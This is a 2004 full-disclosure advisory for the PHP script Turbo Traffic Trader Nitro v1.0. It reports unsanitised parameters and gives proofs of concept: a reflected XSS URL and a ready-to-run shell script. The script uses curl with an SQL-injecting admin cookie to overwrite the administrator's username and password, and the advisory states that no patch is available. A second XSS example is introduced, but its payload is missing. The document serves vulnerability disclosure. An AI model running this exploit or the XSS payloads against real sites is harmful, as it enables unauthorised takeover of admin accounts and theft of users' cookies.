+-----------------------------------------------------------------------+ | Turbo Traffic Trader Nitro v1.0 SQL Injection & XSS Proofs of Concept | | By aCiDBiTS acidbits@gmail.com 10-Oct-2004 | +-----------------------------------------------------------------------+ [ ] [ Your web application needs a security audit? ] [ Email me ! ] [ ] ------------ Introduction ------------ Turbo traffic trader Nitro v1.0 (http://www.turbotraffictrader.com/php/) "is a fully automated traffic trading script", "The World's Most Advanced Free PHP Traffic Trading Script". --------------- Vulnerabilities --------------- There is no user input sanitation for many parameters in different files. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code, or to steal the user-cookie through XSS for the site where TTT is running. The SQL injections only can be performed if the site server has magic quotes set to off. The XSS can be exploited in two ways, one only works if register globals are set to on the other always do. Maybe older versions also vulnerable. These are just some examples, this script has other ways to be exploited. Vendor has been warned but had no reply from him. ----------------- Proofs of concept ----------------- (1.) XSS -------- Through GET, only works if register globals are set to on. From your browser type: http://URL_to_ttt_script/ttt-webmaster.php?msg[0]=%3Cscript%3Ealert(String.fromCharCode(88)%2BString.fromCharCode(83)%2BString.fromCharCode(83));%3C/script%3E (2.) XSS -------- Through POST, the victim should click something like this:
(3.) SQL Injection ------------------ With this you can set whatever username and password for TTT script admin. Only works if the site server has magic quotes turned off. ttt_sqli_poc.sh -------8<----------------------8<---------------------8<---------------------------- #!/bin/sh echo "+----------------------------------------------------------------+" echo "| Turbo Traffic Trader Nitro v1.0 SQL Injection Proof of Concept |" echo "| By aCiDBiTS acidbits@gmail.com 10-Oct-2004 |" echo "+----------------------------------------------------------------+" echo "" if test $# -lt 3; then echo "Usage: $0 URL_to_ttt_script new_username new_password" echo "Eg: ./ttt_sqli_poc http://127.0.0.1/ttt john 1234" echo "" exit fi echo "[+] Setting username: $2" echo " password: $3" echo "" curl -s -o "/dev/null" -b "ttt_admin=9999999999%7Cfake%7C%27)AS%20pass2,%27fake%27%20as%20username,%27fake%27%20as%20password,(%27fake" -d "changepass=1&username=$2&password=$3&password2=$3" "$1/tttadmin/settings.php" echo "[+] Now go to $1/tttadmin and good login ;-)" echo "" echo " \ /" echo " (Oo)" echo "//||\\\\" -------8<----------------------8<---------------------8<---------------------------- --------- Quick Fix --------- No fix at this moment. Too many parts of the code have to be patched. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html